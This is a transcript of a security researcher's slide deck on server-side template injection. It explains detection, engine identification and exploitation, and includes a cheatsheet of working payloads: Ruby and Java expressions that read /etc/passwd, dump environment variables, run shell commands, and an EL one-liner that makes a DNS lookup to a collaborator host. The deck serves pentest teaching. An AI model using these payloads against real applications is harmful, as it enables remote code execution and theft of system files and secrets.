Server Side Template Injection

Transcript

1. Server Side Template Injection

2. Whoami Dhamotharan Offensive Web Application Security Researcher Occasional bug bounty

   hunter on Hackerone ,Bugcrowd, etc. Dhamu_offi on twitter

3. AGENDA Template Injection What is SSTI Methodology Automated Tools Cheatsheet

   Demo

4. Template Injection Template injection allows an attacker to include template

   code into an existing (or not) template. A template engine makes designing HTML pages easier by using static template files which at runtime replaces variables/placeholders with actual values in the HTML pages

5. Template Injection Template engines are designed to combine templates with

   a data model to produce result documents which helps populating dynamic data into web pages. Template engines can be used to display information about users, products etc. Some of the most popular template engines can be listed as the followings: • PHP – Smarty, Twigs • Java – Velocity, Freemaker • Python – JINJA, Mako, Tornado • JavaScript – Jade, Rage • Ruby – Liquid

6. Server Side Template Injection SSTI Tip Server-side template injection is

   a vulnerability where the attacker injects malicious input into a template to execute commands on the server- side.

7. SSTI Server-side template injection is a vulnerability where the attacker

   injects malicious input into a template to execute commands on the server-side. This vulnerability occurs when invalid user input is embedded into the template engine which can generally lead to remote code execution (RCE)

8. Tip ${7*7} ${{7*7}} #{ 7 * 7 } <%= 7

   * 7 %>

9. Server Side Template Injection Methodology

10. Methodology ➔ Detect ➔ Identify ➔ Exploit

11. Detect. This vulnerability can appear in two distinct contexts, each

    of which requires its own detection method: 1. Plaintext context 2. Code context Tip smarty=Hello {user.name} Hello user1 smarty=Hello ${7*7} Hello 49 Story for illustration purposes only Tip personal_greeting=use rname Hello user0

12. Plaintext context The given input is being rendered and reflected

    into the response. Try to set mathematical operations within a template expression: Tip render('Hello ' + username) http://vulnerable- website.com/?username=$ {7*7} {{7*7}} ${7*7} <%= 7*7 %> ${{7*7}}

13. Code Context In these cases the user input is being

    placed within a template expression: Tip greeting = getQueryParameter('greeting') engine.render("Hello {{"+greeting+"}}", data) http://vulnerable- website.com/?greeting=data.usernam e}}<tag>

14. Identify The template injection potential, the next step is to

    identify the template engine. Although there are a huge number of templating languages, many of them use very similar syntax that is specifically chosen not to clash with HTML characters. As a result, it can be relatively simple to create probing payloads to test which template engine is being used.
15. None

16. Exploit Template engines to show the exploit methodology in practice,

    and make a case for the severity of the issue. The findings may appear to show flaws in template engines themselves, but unless an engine markets itself as suitable for user-submitted templates the responsibility for preventing template injection ultimately lies with web application developers. Lists of builtin methods, functions, filters, and variables. Lists of extensions/plugins - some may be enabled by default.

17. Exploit Generic In this wordlist you can find variables defined

    in the environments of some of the engines mentioned below: https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/template-engines- special-vars.txt https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Sid e%20Template%20Injection

18. Automated Tools Tplmap assists in the exploitation of Code Injection

    and Server-Side Template Injection vulnerabilities with several sandbox escape techniques to get access to the underlying operating system. The tool and its test suite are developed to research the SSTI vulnerability class and to be used as offensive security tools during web application penetration tests.
19. None
20. None
21. None

22. CheatSheet • Ruby ◦ Basic injections ◦ Retrieve /etc/passwd ◦

    List files and directories • Java ◦ Basic injection ◦ Retrieve the system’s environment variables ◦ Retrieve /etc/passwd • Expression Language EL ◦ Basic injection ◦ Code execution

23. Ruby - Basic injections ERB: <%= 7 * 7 %>

    Slim: #{ 7 * 7 } Ruby - Retrieve /etc/passwd <%= File.open('/etc/passwd').read %> Ruby - List files and directories <%= Dir.entries('/') %>

24. Java - Basic injection ${7*7} ${class.getClassLoader()} Java - Retrieve the

    system’s environment variables ${T(java.lang.System).getenv()} Java - Retrieve /etc/passwd ${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}

25. Expression Language EL Expression Language EL - Basic injection ${1+1}

    #{1+1} Expression Language EL - One-Liner injections not including code execution // DNS Lookup ${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClass()).invoke("","xxxxxxxxxxxxxx.bur pcollaborator.net")}

26. Demo

27. None
28. None
29. None
30. None

31. Server-Side-Template-Injection - Linux - Privilege Escalation https://github.com/Dhamuharker/Server-Side-Template- Injection

32. Thank you